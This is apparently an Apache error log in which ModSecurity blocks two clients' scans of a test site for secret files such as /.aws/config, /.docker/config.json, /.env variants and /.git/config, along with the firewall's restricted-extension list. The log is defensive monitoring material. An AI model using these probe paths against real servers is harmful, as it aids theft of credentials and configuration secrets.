[Mon Jan 12 15:44:08.105008 2026] [:error] [pid 1358564] [client 18.183.223.70:53882] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWUIuB_UgGRJ4jDk47tQnwAAAAY"]
[Mon Jan 12 15:44:08.829457 2026] [authz_core:error] [pid 1355925] [client 18.183.223.70:54040] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Mon Jan 12 15:44:09.561043 2026] [authz_core:error] [pid 1355924] [client 18.183.223.70:54198] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/logs
[Mon Jan 12 15:44:16.114441 2026] [:error] [pid 1355925] [client 18.183.223.70:55634] [client 18.183.223.70] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWUIwE7thAymmecRvtl01wAAAAI"]
[Mon Jan 12 15:44:16.114651 2026] [:error] [pid 1355925] [client 18.183.223.70:55634] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWUIwE7thAymmecRvtl01wAAAAI"]
[Mon Jan 12 15:44:16.114813 2026] [:error] [pid 1355925] [client 18.183.223.70:55634] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWUIwE7thAymmecRvtl01wAAAAI"]
[Mon Jan 12 15:44:19.762306 2026] [:error] [pid 1362231] [client 18.183.223.70:56380] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWUIw8uCkgRo958sQERiTgAAAAc"]
[Mon Jan 12 15:44:19.762646 2026] [:error] [pid 1362231] [client 18.183.223.70:56380] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWUIw8uCkgRo958sQERiTgAAAAc"]
[Mon Jan 12 15:44:19.762821 2026] [:error] [pid 1362231] [client 18.183.223.70:56380] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aWUIw8uCkgRo958sQERiTgAAAAc"]
[Mon Jan 12 15:44:20.486441 2026] [:error] [pid 1355923] [client 18.183.223.70:56538] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWUIxCE1xEBhFyXickXruwAAAAA"]
[Mon Jan 12 15:44:20.486757 2026] [:error] [pid 1355923] [client 18.183.223.70:56538] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWUIxCE1xEBhFyXickXruwAAAAA"]
[Mon Jan 12 15:44:20.486921 2026] [:error] [pid 1355923] [client 18.183.223.70:56538] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWUIxCE1xEBhFyXickXruwAAAAA"]
[Mon Jan 12 15:44:24.101206 2026] [:error] [pid 1355924] [client 18.183.223.70:57264] [client 18.183.223.70] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWUIyNIpinFXoPzDav5wmwAAAAE"]
[Mon Jan 12 15:44:24.101426 2026] [:error] [pid 1355924] [client 18.183.223.70:57264] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWUIyNIpinFXoPzDav5wmwAAAAE"]
[Mon Jan 12 15:44:24.101589 2026] [:error] [pid 1355924] [client 18.183.223.70:57264] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWUIyNIpinFXoPzDav5wmwAAAAE"]
[Mon Jan 12 15:44:32.125451 2026] [:error] [pid 1355926] [client 18.183.223.70:58836] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWUI0MC2y5bYy1r2HoPzgwAAAAM"]
[Mon Jan 12 15:44:32.125659 2026] [:error] [pid 1355926] [client 18.183.223.70:58836] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWUI0MC2y5bYy1r2HoPzgwAAAAM"]
[Mon Jan 12 15:44:32.125813 2026] [:error] [pid 1355926] [client 18.183.223.70:58836] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWUI0MC2y5bYy1r2HoPzgwAAAAM"]
[Tue Jan 13 06:19:22.414301 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWXV2kJqSCffH1oPeplGKAAAAAc"]
[Tue Jan 13 06:19:22.414570 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWXV2kJqSCffH1oPeplGKAAAAAc"]
[Tue Jan 13 06:19:22.414780 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWXV2kJqSCffH1oPeplGKAAAAAc"]
[Tue Jan 13 06:19:22.437437 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWXV2kJqSCffH1oPeplGKQAAAAc"]
[Tue Jan 13 06:19:22.437660 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWXV2kJqSCffH1oPeplGKQAAAAc"]
[Tue Jan 13 06:19:22.437808 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWXV2kJqSCffH1oPeplGKQAAAAc"]
[Tue Jan 13 06:19:22.471554 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWXV2kJqSCffH1oPeplGKgAAAAc"]
[Tue Jan 13 06:19:22.471679 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWXV2kJqSCffH1oPeplGKgAAAAc"]
[Tue Jan 13 06:19:22.471891 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWXV2kJqSCffH1oPeplGKgAAAAc"]
[Tue Jan 13 06:19:22.472048 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWXV2kJqSCffH1oPeplGKgAAAAc"]
[Tue Jan 13 06:19:22.504784 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWXV2kJqSCffH1oPeplGKwAAAAc"]
[Tue Jan 13 06:19:22.504973 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWXV2kJqSCffH1oPeplGKwAAAAc"]
[Tue Jan 13 06:19:22.505114 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWXV2kJqSCffH1oPeplGKwAAAAc"]
[Tue Jan 13 06:19:22.538724 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWXV2kJqSCffH1oPeplGLAAAAAc"]
[Tue Jan 13 06:19:22.538903 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWXV2kJqSCffH1oPeplGLAAAAAc"]
[Tue Jan 13 06:19:22.539043 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWXV2kJqSCffH1oPeplGLAAAAAc"]
[Tue Jan 13 06:19:22.571090 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWXV2kJqSCffH1oPeplGLQAAAAc"]
[Tue Jan 13 06:19:22.571261 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWXV2kJqSCffH1oPeplGLQAAAAc"]
[Tue Jan 13 06:19:22.571405 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWXV2kJqSCffH1oPeplGLQAAAAc"]
[Tue Jan 13 06:19:22.594700 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWXV2kJqSCffH1oPeplGLgAAAAc"]
[Tue Jan 13 06:19:22.595391 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWXV2kJqSCffH1oPeplGLgAAAAc"]
[Tue Jan 13 06:19:22.596648 2026] [:error] [pid 1378231] [client 195.178.110.132:40798] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWXV2kJqSCffH1oPeplGLgAAAAc"]
